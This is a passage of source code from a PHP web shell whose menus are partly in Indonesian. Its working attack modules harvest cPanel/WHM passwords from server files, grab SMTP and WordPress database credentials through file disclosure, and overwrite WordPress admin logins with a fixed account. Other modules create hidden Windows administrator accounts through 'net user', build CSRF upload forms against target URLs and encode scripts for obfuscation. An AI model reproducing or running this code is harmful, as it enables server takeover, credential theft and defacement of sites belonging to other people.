788. echo "<li> <a href='?dir=$dir&do=rdp'>RDP-Creator</a> </li>";
789. echo "<li> <a href='?dir=$dir&do=manjat'>WHM-User Checker</a> </li>";
790. echo "</ul>";
791. echo "</center>";
792. }
793. elseif($_GET['do'] == 'manjat') {
794. echo "<center>";
795. echo "<ul>";
796. echo "<li> <a href='?dir=$dir&do=bc'>Simple Back-Connect</a> </li>";
797. echo "<li> <a href='?dir=$dir&do=pbc'>Perl Back-Connect</a> </li>";
798. echo "<li> <a href='?dir=$dir&do=ptbc'>Python Back-Connect</a> </li>";
799. echo "<li> <a href='?dir=$dir&do=portsc'>Port Scanner</a> </li>";
800. echo "<li> <a href='?dir=$dir&do=hash'>Hash Identification</a> </li>";
801. echo "<li> <a href='?dir=$dir&do=whmcs'>WHMCS Decoder</a> </li>";
802. echo "<li> <a href='?dir=$dir&do=tetangga'>Reverse Domain</a> </li>";
803. echo "<li> <a href='?dir=$dir&do=wpes'>Auto Edit User WP</a> </li>";
804. echo "<li> <a href='?dir=$dir&do=wlfd'>WP LFD Exploit</a> </li><br>";
805. echo "<li> <a href='?dir=$dir&do=smtp'>VHosts SMTP Grabber</a> </li>";
806. echo "<li> <a href='?dir=$dir&do=csrf'>CSRF ONLINE</a> </li>";
807. echo "<li> <a href='?dir=$dir&do=scdc'>Script Decoder</a> </li>";
808. echo "<li> <a href='?dir=$dir&do=rdp'>RDP-Creator</a> </li>";
809. echo "<li> <a href='?dir=$dir&do=manjat'>WHM-User Checker</a> </li>";
810. echo "</ul>";
811. echo "</center>";
812.  
813. echo "<center>";
814. $d0mains = @file('/etc/named.conf');
815. $domains = scandir("/var/named");
816.  
817. if ($domains or $d0mains)
818. {
819. $domains = scandir("/var/named");
820. if($domains) {
821. echo "<table align='center'><tr><th> COUNT </th><th> DOMAIN </th><th> USER </th></tr>";
822. $count=1;
823. $dc = 0;
824. $list = scandir("/var/named");
825. foreach($list as $domain){
826. if(strpos($domain,".db")){
827. $domain = str_replace('.db','',$domain);
828. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
829. $dirz = '/home/'.$owner['name'].'/cpanel3-skel';
830. $path = getcwd();
831.  
832. if (is_readable($dirz)) {
833. copy($dirz, ''.$path.'/lol/'.$owner['name'].'.txt');
834. $p=file_get_contents(''.$path.'/lol/'.$owner['name'].'.txt');
835. $password=entre2v2($p,'password="','"');
836. echo "<tr><td>".$count++."</td><td><a href='http://$domain' target='_blank'>".$domain."</a></td><td>".$owner['name']."</td><td>".$password."</td></tr>";
837. $dc++;
838. }
839.  
840. }
841. }
842. echo '</table>';
843. $total = $dc;
844. echo '<br><div class="result">Total WHM User Found = '.$total.'</h3><br />';
845. echo '</center>';
846. }else{
847. $d0mains = @file('/etc/named.conf');
848. if($d0mains) {
849. echo "<table align='center'><tr><th> COUNT </th><th> DOMAIN </th><th> USER </th></tr>";
850. $count=1;
851. $dc = 0;
852. $mck = array();
853. foreach($d0mains as $d0main){
854. if(@eregi('zone',$d0main)){
855. preg_match_all('#zone "(.*)"#',$d0main,$domain);
856. flush();
857. if(strlen(trim($domain[1][0])) >2){
858. $mck[] = $domain[1][0];
859. }
860. }
861. }
862. $mck = array_unique($mck);
863. $usr = array();
864. $dmn = array();
865. foreach($mck as $o) {
866. $infos = @posix_getpwuid(fileowner("/etc/valiases/".$o));
867. $usr[] = $infos['name'];
868. $dmn[] = $o;
869. }
870. array_multisort($usr,$dmn);
871. $dt = file('/etc/passwd');
872. $passwd = array();
873. foreach($dt as $d) {
874. $r = explode(':',$d);
875. if(strpos($r[5],'home')) {
876. $passwd[$r[0]] = $r[5];
877. }
878. }
879. $l=0;
880. $j=1;
881. foreach($usr as $r) {
882. $dirz = '/home/'.$r.'/cpanel3-skel';
883. $path = getcwd();
884. if (is_readable($dirz)) {
885. copy($dirz, ''.$path.'/lol/'.$r.'.txt');
886. $p=file_get_contents(''.$path.'/lol/'.$r.'.txt');
887. $password=entre2v2($p,'password="','"');
888. echo "<tr><td>".$count++."</td><td><a target='_blank' href=http://".$dmn[$j-1].'/>'.$dmn[$j-1].' </a></td><td>'.$r."</td><td>".$password."</td><td></tr>";
889. $dc++;
890. flush();
891. $l=$l?0:1;
892. $j++;
893. }
894. }
895. }
896. echo '</table>';
897. $total = $dc;
898. echo '<br><div class="result">Total WHM Account Found = '.$total.'</h3><br />';
899. echo '</center>';
900.  
901. }
902. }
903.  
904. }
905. elseif($_GET['do'] == 'smtp') {
906. echo "<center>";
907. echo "<ul>";
908. echo "<li> <a href='?dir=$dir&do=bc'>Simple Back-Connect</a> </li>";
909. echo "<li> <a href='?dir=$dir&do=pbc'>Perl Back-Connect</a> </li>";
910. echo "<li> <a href='?dir=$dir&do=ptbc'>Python Back-Connect</a> </li>";
911. echo "<li> <a href='?dir=$dir&do=portsc'>Port Scanner</a> </li>";
912. echo "<li> <a href='?dir=$dir&do=hash'>Hash Identification</a> </li>";
913. echo "<li> <a href='?dir=$dir&do=whmcs'>WHMCS Decoder</a> </li>";
914. echo "<li> <a href='?dir=$dir&do=tetangga'>Reverse Domain</a> </li>";
915. echo "<li> <a href='?dir=$dir&do=wpes'>Auto Edit User WP</a> </li>";
916. echo "<li> <a href='?dir=$dir&do=wlfd'>WP LFD Exploit</a> </li><br>";
917. echo "<li> <a href='?dir=$dir&do=smtp'>VHosts SMTP Grabber</a> </li>";
918. echo "<li> <a href='?dir=$dir&do=csrf'>CSRF ONLINE</a> </li>";
919. echo "<li> <a href='?dir=$dir&do=scdc'>Script Decoder</a> </li>";
920. echo "<li> <a href='?dir=$dir&do=rdp'>RDP-Creator</a> </li>";
921. echo "<li> <a href='?dir=$dir&do=manjat'>WHM-User Checker</a> </li>";
922. echo "</ul>";
923. echo "</center>";
924. echo"<center>
925. <br><br><br>
926. VHosts SMTP Grabber<br><br>
927. <form method='post'>
928. <textarea style='width: 450px; height: 150px;' name='sites' placeholder='http://domen.com/dir_config/config.txt'></textarea><br>
929. <input type='submit' name='go' value='Hajar'>
930. </form>";
931. $ya=$_POST['go'];
932. $co=$_POST['sites'];
933.  
934. if($ya){
935. $e=explode("\r\n",$co);
936. foreach($e as $bda){
937. //echo '<br>'.$bda;
938. $linkof='';
939. $dn=($bda).($linkof);
940. $file=@file_get_contents($dn);
941. if(preg_match("/JConfig|joomla/", $file)) {
942. echo'<center><font face="Iceland" color=Red >----------------------------------------------</font></center>';
943. echo "<font face='Iceland' color=lime >SMTP USER : </font>".findit($file,"smtpuser = '","'")."<br>";
944. echo "<font face='Iceland' color=lime >SMTP PASS : </font>".findit($file,"smtppass = '","'")."<br>";
945. echo "<font face='Iceland' color=lime >SMTP HOST : </font>".findit($file,"smtphost = '","'")."<br>";
946. echo "<font face='Iceland' color=lime >SMTP PORT : </font>".findit($file,"smtpport = '","'")."<br>";
947. echo "<font face='Iceland' color=lime >SMTP AUTH : </font>".findit($file,"smtpauth = '","'")."<br>";
948. echo "<font face='Iceland' color=lime >SMTP SECURE : </font>".findit($file,"smtpsecure = '","'")."<br>";
949. }
950.  
951. else{echo "<center><font face='Iceland' color='Red' >".$bda." ----> There is no SMTP </font></center>";}
952. echo'<center><font face="Iceland" color=red >----------------------------------------------</font></center>';
953. }
954.  
955. }
956.  
957.  
958. }
959. elseif($_GET['do'] == 'scdc') {
960. echo "<center>";
961. echo "<ul>";
962. echo "<li> <a href='?dir=$dir&do=bc'>Simple Back-Connect</a> </li>";
963. echo "<li> <a href='?dir=$dir&do=pbc'>Perl Back-Connect</a> </li>";
964. echo "<li> <a href='?dir=$dir&do=ptbc'>Python Back-Connect</a> </li>";
965. echo "<li> <a href='?dir=$dir&do=portsc'>Port Scanner</a> </li>";
966. echo "<li> <a href='?dir=$dir&do=hash'>Hash Identification</a> </li>";
967. echo "<li> <a href='?dir=$dir&do=whmcs'>WHMCS Decoder</a> </li>";
968. echo "<li> <a href='?dir=$dir&do=tetangga'>Reverse Domain</a> </li>";
969. echo "<li> <a href='?dir=$dir&do=wpes'>Auto Edit User WP</a> </li>";
970. echo "<li> <a href='?dir=$dir&do=wlfd'>WP LFD Exploit</a> </li><br>";
971. echo "<li> <a href='?dir=$dir&do=smtp'>VHosts SMTP Grabber</a> </li>";
972. echo "<li> <a href='?dir=$dir&do=csrf'>CSRF ONLINE</a> </li>";
973. echo "<li> <a href='?dir=$dir&do=scdc'>Script Decoder</a> </li>";
974. echo "<li> <a href='?dir=$dir&do=rdp'>RDP-Creator</a> </li>";
975. echo "<li> <a href='?dir=$dir&do=manjat'>WHM-User Checker</a> </li>";
976. echo "</ul>";
977. echo "</center>";
978.  
979. $text = $_POST['code'];
980. echo"<center><br><b>Script Encode and Decode</b><br>
981. <form method='post'><br><br><br>
982. <textarea style='width: 450px; height: 150px;' name='code' placeholder='scmu'></textarea><br><br>
983. <select class='inputz' size='1' name='ope'>
984. <option value='base64'>Base64</option>
985. <option value='gzinflate'>str_rot13 - gzinflate - base64</option>
986. <option value='str'>str_rot13 - gzinflate - str_rot13 - base64</option>
987. </select>&nbsp;<input type='submit' name='submit' value='Encrypt'>
988. <input type='submit' name='submits' value='Decrypt'>
989. </form>";
990. $submit = $_POST['submit'];
991. if (isset($submit)) {
992. $op = $_POST["ope"];
993. switch ($op) {
994. case 'base64':
995. $codi = base64_encode($text);
996. break;
997. case 'str':
998. $codi = (base64_encode(str_rot13(gzdeflate(str_rot13($text)))));
999. break;
1000. case 'gzinflate':
1001. $codi = base64_encode(gzdeflate(str_rot13($text)));
1002. break;
1003. default:
1004. break;
1005. }
1006. }
1007. $submit = $_POST['submits'];
1008. if (isset($submit)) {
1009. $op = $_POST["ope"];
1010. switch ($op) {
1011. case 'base64':
1012. $codi = base64_decode($text);
1013. break;
1014. case 'str':
1015. $codi = str_rot13(gzinflate(str_rot13(base64_decode(($text)))));
1016. break;
1017. case 'gzinflate':
1018. $codi = str_rot13(gzinflate(base64_decode($text)));
1019. break;
1020. default:
1021. break;
1022. }
1023. }
1024. echo "<textarea style='width: 450px; height: 150px;' readonly>$codi</textarea></center><BR><BR>";
1025. }
1026. elseif($_GET['do'] == 'csrf') {
1027. echo "<center>";
1028. echo "<ul>";
1029. echo "<li> <a href='?dir=$dir&do=bc'>Simple Back-Connect</a> </li>";
1030. echo "<li> <a href='?dir=$dir&do=pbc'>Perl Back-Connect</a> </li>";
1031. echo "<li> <a href='?dir=$dir&do=ptbc'>Python Back-Connect</a> </li>";
1032. echo "<li> <a href='?dir=$dir&do=portsc'>Port Scanner</a> </li>";
1033. echo "<li> <a href='?dir=$dir&do=hash'>Hash Identification</a> </li>";
1034. echo "<li> <a href='?dir=$dir&do=whmcs'>WHMCS Decoder</a> </li>";
1035. echo "<li> <a href='?dir=$dir&do=tetangga'>Reverse Domain</a> </li>";
1036. echo "<li> <a href='?dir=$dir&do=wpes'>Auto Edit User WP</a> </li>";
1037. echo "<li> <a href='?dir=$dir&do=wlfd'>WP LFD Exploit</a> </li><br>";
1038. echo "<li> <a href='?dir=$dir&do=smtp'>VHosts SMTP Grabber</a> </li>";
1039. echo "<li> <a href='?dir=$dir&do=csrf'>CSRF ONLINE</a> </li>";
1040. echo "<li> <a href='?dir=$dir&do=scdc'>Script Decoder</a> </li>";
1041. echo "<li> <a href='?dir=$dir&do=rdp'>RDP-Creator</a> </li>";
1042. echo "<li> <a href='?dir=$dir&do=manjat'>WHM-User Checker</a> </li>";
1043. echo "</ul>";
1044. echo "</center>";
1045.  
1046. echo"<center> CSRF ONLINE
1047. <html>
1048. <form method='post'>
1049. <select name='array' required>
1050. <option value=''>Array</option>
1051. <option value='files[]'>files []</option>
1052. <option value='qqfile'>qqfile</option>
1053. <option value='Filedata'>Filedata</option>
1054. <option value='FileUpload'>FileUpload</option>
1055. <option value='userfile'>userfile</option>
1056. <option value='Uploadfile'>Uploadfile</option>
1057. <option value='file'>file</option>
1058. </select>
1059. <input type='text' name='target' size='50' height='10' placeholder='url http://site.com/bug/vuln.php' style='margin: 5px auto; padding-left: 5px;' required><br>
1060. <input type='submit' name='kunci' value='Lock!'>
1061. </form>";
1062.  
1063. $url = $_POST['target'];
1064. $pf = $_POST['array'];
1065. $terkuncyihh = $_POST['kunci'];
1066. if($terkuncyihh) {
1067. echo "<form method='post'
1068. target='_blank' action='$url'
1069. enctype='multipart/form-data'>
1070. <input type='file' name='$pf'>
1071. <input type='submit' name='g'
1072. value='Hajar'></form";
1073. }
1074. }
1075. elseif($_GET['do'] == 'wlfd') {
1076. echo "<center>";
1077. echo "<ul>";
1078. echo "<li> <a href='?dir=$dir&do=bc'>Simple Back-Connect</a> </li>";
1079. echo "<li> <a href='?dir=$dir&do=pbc'>Perl Back-Connect</a> </li>";
1080. echo "<li> <a href='?dir=$dir&do=ptbc'>Python Back-Connect</a> </li>";
1081. echo "<li> <a href='?dir=$dir&do=portsc'>Port Scanner</a> </li>";
1082. echo "<li> <a href='?dir=$dir&do=hash'>Hash Identification</a> </li>";
1083. echo "<li> <a href='?dir=$dir&do=whmcs'>WHMCS Decoder</a> </li>";
1084. echo "<li> <a href='?dir=$dir&do=tetangga'>Reverse Domain</a> </li>";
1085. echo "<li> <a href='?dir=$dir&do=wpes'>Auto Edit User WP</a> </li>";
1086. echo "<li> <a href='?dir=$dir&do=wlfd'>WP LFD Exploit</a> </li><br>";
1087. echo "<li> <a href='?dir=$dir&do=smtp'>VHosts SMTP Grabber</a> </li>";
1088. echo "<li> <a href='?dir=$dir&do=csrf'>CSRF ONLINE</a> </li>";
1089. echo "<li> <a href='?dir=$dir&do=scdc'>Script Decoder</a> </li>";
1090. echo "<li> <a href='?dir=$dir&do=rdp'>RDP-Creator</a> </li>";
1091. echo "<li> <a href='?dir=$dir&do=manjat'>WHM-User Checker</a> </li>";
1092. echo "</ul>";
1093. echo "</center>";
1094.  
1095. echo"<center>
1096. <br><br><br>
1097. Wordpress Mass Disclosure<br><br>
1098. <form method='post'>
1099. <textarea style='width: 450px; height: 150px;' name='sites' placeholder='http://targetmu.com/path/bug.php?file=../../wp-config.php'></textarea><br>
1100. <input type='submit' name='go' value='Hajar'>
1101. </form>";
1102.  
1103. $ya=$_POST['go'];
1104. $co=$_POST['sites'];
1105.  
1106. if($ya){
1107. $e=explode("\r\n",$co);
1108. foreach($e as $bda){
1109. //echo '<br>'.$bda;
1110. $dn=($bda);
1111. $file=@file_get_contents($dn);
1112. if(eregi('DB_HOST',$file) and !eregi('FTP_USER',$file) ){
1113. echo'<center><font face="Iceland" color=Red >----------------------------------------------</font></center>';
1114. echo "<center><font face='Iceland' color=Lime>".$bda."</font></center>";
1115. echo "<font face='Iceland' color=lime >DB name : </font>".findit($file,"DB_NAME', '","');")."<br>";
1116. echo "<font face='Iceland' color=lime >DB user : </font>".findit($file,"DB_USER', '","');")."<br>";
1117. echo "<font face='Iceland' color=lime >DB pass : </font>".findit($file,"DB_PASSWORD', '","');")."<br>";
1118. echo "<font face='Iceland' color=lime >DB host : </font>".findit($file,"DB_HOST', '","');")."<br>";
1119. }
1120.  
1121. else{echo "<center><font face='Iceland' color='Red' >".$bda." ----> Not Infected </font></center>";}
1122. echo'<center><font face="Iceland" color=red >----------------------------------------------</font></center>';
1123. }
1124.  
1125. }
1126.  
1127. }
1128. elseif($_GET['do'] == 'wpes') {
1129. echo "<center>";
1130. echo "<ul>";
1131. echo "<li> <a href='?dir=$dir&do=bc'>Simple Back-Connect</a> </li>";
1132. echo "<li> <a href='?dir=$dir&do=pbc'>Perl Back-Connect</a> </li>";
1133. echo "<li> <a href='?dir=$dir&do=ptbc'>Python Back-Connect</a> </li>";
1134. echo "<li> <a href='?dir=$dir&do=portsc'>Port Scanner</a> </li>";
1135. echo "<li> <a href='?dir=$dir&do=hash'>Hash Identification</a> </li>";
1136. echo "<li> <a href='?dir=$dir&do=whmcs'>WHMCS Decoder</a> </li>";
1137. echo "<li> <a href='?dir=$dir&do=tetangga'>Reverse Domain</a> </li>";
1138. echo "<li> <a href='?dir=$dir&do=wpes'>Auto Edit User WP</a> </li>";
1139. echo "<li> <a href='?dir=$dir&do=wlfd'>WP LFD Exploit</a> </li><br>";
1140. echo "<li> <a href='?dir=$dir&do=smtp'>VHosts SMTP Grabber</a> </li>";
1141. echo "<li> <a href='?dir=$dir&do=csrf'>CSRF ONLINE</a> </li>";
1142. echo "<li> <a href='?dir=$dir&do=scdc'>Script Decoder</a> </li>";
1143. echo "<li> <a href='?dir=$dir&do=rdp'>RDP-Creator</a> </li>";
1144. echo "<li> <a href='?dir=$dir&do=manjat'>WHM-User Checker</a> </li>";
1145. echo "</ul>";
1146. echo "</center>";
1147.  
1148. if($_POST['auto_deface_wp']) {
1149. function anucurl($sites) {
1150. $ch = curl_init($sites);
1151. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1152. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1153. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
1154. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
1155. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1156. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1157. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1158. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1159. curl_setopt($ch, CURLOPT_COOKIESESSION,true);
1160. $data = curl_exec($ch);
1161. curl_close($ch);
1162. return $data;
1163. }
1164. function lohgin($cek, $web, $userr, $pass, $wp_submit) {
1165. $post = array(
1166. "log" => "$userr",
1167. "pwd" => "$pass",
1168. "rememberme" => "forever",
1169. "wp-submit" => "$wp_submit",
1170. "redirect_to" => "$web",
1171. "testcookie" => "1",
1172. );
1173. $ch = curl_init($cek);
1174. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1175. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1176. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
1177. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1178. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1179. curl_setopt($ch, CURLOPT_POST, 1);
1180. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
1181. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1182. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1183. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
1184. $data = curl_exec($ch);
1185. curl_close($ch);
1186. return $data;
1187. }
1188. $link = explode("\r\n", $_POST['link']);
1189. $script = htmlspecialchars($_POST['script']);
1190. $user = "bahari";
1191. $pass = "bahari";
1192. $passx = md5($pass);
1193. foreach($link as $dir_config) {
1194. $config = anucurl($dir_config);
1195. $dbhost = ambilkata($config,"DB_HOST', '","'");
1196. $dbuser = ambilkata($config,"DB_USER', '","'");
1197. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
1198. $dbname = ambilkata($config,"DB_NAME', '","'");
1199. $dbprefix = ambilkata($config,"table_prefix = '","'");
1200. $prefix = $dbprefix."users";
1201. $option = $dbprefix."options";
1202. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1203. $db = mysql_select_db($dbname);
1204. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
1205. $result = mysql_fetch_array($q);
1206. $id = $result[ID];
1207. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
1208. $result2 = mysql_fetch_array($q2);
1209. $target = $result2[option_value];
1210. if($target == '') {
1211. echo "Error, Cant edit the user :(</font><br>";
1212. } else {
1213. echo "<font color='lime'>Done</font> >> <a href='$target/wp-login.php' target='_blank'> $target <a><br>
1214. <font color='lime'>User</font> : bahari<br>
1215. <font color='lime'>Password</font> : bahari<br>";
1216. }
1217. $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
1218. if(!$conn OR !$db OR !$update) {
1219. echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
1220. mysql_close($conn);
1221. } else {
1222. }
1223. }
1224. } else {
1225. echo "<center><h1>WordPress Auto Edit User</h1>
1226. <form method='post'>
1227. Link Config: <br>
1228. <textarea name='link' placeholder='http://target.com/btm_conf/user-config.txt' style='width: 450px; height:250px;'></textarea><br>
1229. <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar'>
1230. </form></center>";
1231. }
1232. }
1233. elseif($_GET['do'] == 'rdp') {
1234. echo "<center>";
1235. echo "<ul>";
1236. echo "<li> <a href='?dir=$dir&do=bc'>Simple Back-Connect</a> </li>";
1237. echo "<li> <a href='?dir=$dir&do=pbc'>Perl Back-Connect</a> </li>";
1238. echo "<li> <a href='?dir=$dir&do=ptbc'>Python Back-Connect</a> </li>";
1239. echo "<li> <a href='?dir=$dir&do=portsc'>Port Scanner</a> </li>";
1240. echo "<li> <a href='?dir=$dir&do=hash'>Hash Identification</a> </li>";
1241. echo "<li> <a href='?dir=$dir&do=whmcs'>WHMCS Decoder</a> </li>";
1242. echo "<li> <a href='?dir=$dir&do=tetangga'>Reverse Domain</a> </li>";
1243. echo "<li> <a href='?dir=$dir&do=wpes'>Auto Edit User WP</a> </li>";
1244. echo "<li> <a href='?dir=$dir&do=wlfd'>WP LFD Exploit</a> </li><br>";
1245. echo "<li> <a href='?dir=$dir&do=smtp'>VHosts SMTP Grabber</a> </li>";
1246. echo "<li> <a href='?dir=$dir&do=csrf'>CSRF ONLINE</a> </li>";
1247. echo "<li> <a href='?dir=$dir&do=scdc'>Script Decoder</a> </li>";
1248. echo "<li> <a href='?dir=$dir&do=rdp'>RDP-Creator</a> </li>";
1249. echo "<li> <a href='?dir=$dir&do=manjat'>WHM-User Checker</a> </li>";
1250. echo "</ul>";
1251. echo "</center>";
1252. if(strtolower(substr(PHP_OS, 0, 3)) === 'win') {
1253. if($_POST['create']) {
1254. $user = htmlspecialchars($_POST['user']);
1255. $pass = htmlspecialchars($_POST['pass']);
1256. if(preg_match("/$user/", exe("net user"))) {
1257. echo "[INFO] -> <font color=red>user <font color=lime>$user</font> sudah ada</font>";
1258. } else {
1259. $add_user = exe("net user $user $pass /add");
1260. $add_groups1 = exe("net localgroup Administrators $user /add");
1261. $add_groups2 = exe("net localgroup Administrator $user /add");
1262. $add_groups3 = exe("net localgroup Administrateur $user /add");
1263. echo "<center>[ RDP ACCOUNT INFO ]<br>
1264. ------------------------------<br>
1265. IP: <font color=lime>".$ip."</font><br>
1266. Username: <font color=lime>$user</font><br>
1267. Password: <font color=lime>$pass</font><br>
1268. ------------------------------<br><br>
1269. [ STATUS ]<br>
1270. ------------------------------<br>
1271. </center>";
1272. if($add_user) {
1273. echo "[add user] -> <font color='lime'>Berhasil</font><br>";
1274. } else {
1275. echo "[add user] -> <font color='red'>Gagal</font><br>";
1276. }
1277. if($add_groups1) {
1278. echo "[add localgroup Administrators] -> <font color='lime'>Berhasil</font><br>";
1279. } elseif($add_groups2) {
1280. echo "[add localgroup Administrator] -> <font color='lime'>Berhasil</font><br>";
1281. } elseif($add_groups3) {
1282. echo "[add localgroup Administrateur] -> <font color='lime'>Berhasil</font><br>";
1283. } else {
1284. echo "[add localgroup] -> <font color='red'>Gagal</font><br>";
1285. }
1286. echo "------------------------------<br>";
1287. }
1288. } elseif($_POST['s_opsi']) {
1289. $user = htmlspecialchars($_POST['r_user']);
1290. if($_POST['opsi'] == '1') {
1291. $cek = exe("net user $user");
1292. echo "Checking username <font color=lime>$user</font> ....... ";
1293. if(preg_match("/$user/", $cek)) {
1294. echo "[ <font color=lime>Sudah ada</font> ]<br>
1295. ------------------------------<br><br>
1296. <pre>$cek</pre>";
1297. } else {
1298. echo "[ <font color=red>belum ada</font> ]";
1299. }
1300. } elseif($_POST['opsi'] == '2') {
1301. $cek = exe("net user $user indoxploit");
1302. if(preg_match("/$user/", exe("net user"))) {
1303. echo "[change password: <font color=lime>indoxploit</font>] -> ";
1304. if($cek) {
1305. echo "<font color=lime>Berhasil</font>";
1306. } else {
1307. echo "<font color=red>Gagal</font>";
1308. }
1309. } else {
1310. echo "[INFO] -> <font color=red>user <font color=lime>$user</font> belum ada</font>";
1311. }
1312. } elseif($_POST['opsi'] == '3') {
1313. $cek = exe("net user $user /DELETE");
1314. if(preg_match("/$user/", exe("net user"))) {
1315. echo "[remove user: <font color=lime>$user</font>] -> ";
1316. if($cek) {
1317. echo "<font color=lime>Berhasil</font>";
1318. } else {
1319. echo "<font color=red>Gagal</font>";
1320. }
1321. } else {
1322. echo "[INFO] -> <font color=red>user <font color=lime>$user</font> belum ada</font>";
1323. }
1324. } else {
1325. //
1326. }
1327. } else {
1328. echo "<center>-- Create RDP --<br>
1329. <form method='post'>
1330. <input type='text' name='user' placeholder='username' value='denita' required>
1331. <input type='text' name='pass' placeholder='password' value='denita' required>
1332. <input type='submit' name='create' value='>>'>
1333. </form>
1334. -- Option --<br>
1335. <form method='post'>
1336. <input type='text' name='r_user' placeholder='username' required>
1337. <select name='opsi'>
1338. <option value='1'>Cek Username</option>
1339. <option value='2'>Ubah Password</option>
1340. <option value='3'>Hapus Username</option>
1341. </select>
1342. <input type='submit' name='s_opsi' value='>>'>
1343. </form></center>
1344. ";
1345. }
1346. } else {
1347. echo "<font color=red>Fitur ini hanya dapat digunakan dalam Windows Server.</font>";
1348. }
1349.  
1350. }
1351. elseif($_GET['do'] == 'tetangga') {
1352. echo "<center>";
1353. echo "<ul>";
1354. echo "<li> <a href='?dir=$dir&do=bc'>Simple Back-Connect</a> </li>";
1355. echo "<li> <a href='?dir=$dir&do=pbc'>Perl Back-Connect</a> </li>";
1356. echo "<li> <a href='?dir=$dir&do=ptbc'>Python Back-Connect</a> </li>";
1357. echo "<li> <a href='?dir=$dir&do=portsc'>Port Scanner</a> </li>";
1358. echo "<li> <a href='?dir=$dir&do=hash'>Hash Identification</a> </li>";
1359. echo "<li> <a href='?dir=$dir&do=whmcs'>WHMCS Decoder</a> </li>";
1360. echo "<li> <a href='?dir=$dir&do=tetangga'>Reverse Domain</a> </li>";
1361. echo "<li> <a href='?dir=$dir&do=wpes'>Auto Edit User WP</a> </li>";
1362. echo "<li> <a href='?dir=$dir&do=wlfd'>WP LFD Exploit</a> </li><br>";
1363. echo "<li> <a href='?dir=$dir&do=smtp'>VHosts SMTP Grabber</a> </li>";
1364. echo "<li> <a href='?dir=$dir&do=csrf'>CSRF ONLINE</a> </li>";
1365. echo "<li> <a href='?dir=$dir&do=scdc'>Script Decoder</a> </li>";
1366. echo "<li> <a href='?dir=$dir&do=rdp'>RDP-Creator</a> </li>";
1367. echo "<li> <a href='?dir=$dir&do=manjat'>WHM-User Checker</a> </li>";
1368. echo "</ul>";
1369. echo "</center>";
1370.  
1371. echo "<center><span style='font-size:30px; font-family:Fredericka the Great; color:#009900'>Reverse Domain ip Lookup</span></center>
1372. ";
1373. echo "<div id=result>";
1374. echo "<center><br><form><input type='text' size='60' placeholder='watch8x.com' name='setan' /><input type='hidden' name='do' value='tetangga'> &nbsp;<input type='submit' value='&nbsp;&check;&nbsp;'></form></center>";
1375. if(isset($_GET["setan"]))
1376. {
1377. $site = $_GET["setan"];
1378. $setan = "http://domains.yougetsignal.com/domains.php";
1379.  
1380. //Curl Function
1381. $ch = curl_init($setan);
1382. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
1383. curl_setopt($ch, CURLOPT_POSTFIELDS, "remoteAddress=$site&ket=");
1384. curl_setopt($ch, CURLOPT_HEADER, 0);
1385. curl_setopt($ch, CURLOPT_POST, 1);
1386. $resp = curl_exec($ch);
1387. $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",", str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
1388. $array = explode(",,", $resp);
1389. unset($array[0]);
1390. echo "<table style='margin: 0 auto'>";
1391. foreach($array as $lnk)
1392. {
1393. print "<tr><td><a style=\"color:#0f0;font-weight:bold;\" href='$lnk' target=_blank>$lnk</a></td></tr>";
1394. }
1395. echo "</table>";
1396. curl_close($ch);
1397. }
1398. }
1399. elseif($_GET['do'] == 'whmcs') {
1400. echo "<center>";
1401. echo "<ul>";
1402. echo "<li> <a href='?dir=$dir&do=bc'>Simple Back-Connect</a> </li>";
1403. echo "<li> <a href='?dir=$dir&do=pbc'>Perl Back-Connect</a> </li>";
1404. echo "<li> <a href='?dir=$dir&do=ptbc'>Python Back-Connect</a> </li>";
1405. echo "<li> <a href='?dir=$dir&do=portsc'>Port Scanner</a> </li>";
1406. echo "<li> <a href='?dir=$dir&do=hash'>Hash Identification</a> </li>";
1407. echo "<li> <a href='?dir=$dir&do=whmcs'>WHMCS Decoder</a> </li>";
1408. echo "<li> <a href='?dir=$dir&do=tetangga'>Reverse Domain</a> </li>";
1409. echo "<li> <a href='?dir=$dir&do=wpes'>Auto Edit User WP</a> </li>";
1410. echo "<li> <a href='?dir=$dir&do=wlfd'>WP LFD Exploit</a> </li><br>";
1411. echo "<li> <a href='?dir=$dir&do=smtp'>VHosts SMTP Grabber</a> </li>";
1412. echo "<li> <a href='?dir=$dir&do=csrf'>CSRF ONLINE</a> </li>";
1413. echo "<li> <a href='?dir=$dir&do=scdc'>Script Decoder</a> </li>";
1414. echo "<li> <a href='?dir=$dir&do=rdp'>RDP-Creator</a> </li>";
1415. echo "<li> <a href='?dir=$dir&do=manjat'>WHM-User Checker</a> </li>";
1416. echo "</ul>";
1417. echo "</center>";
1418.  
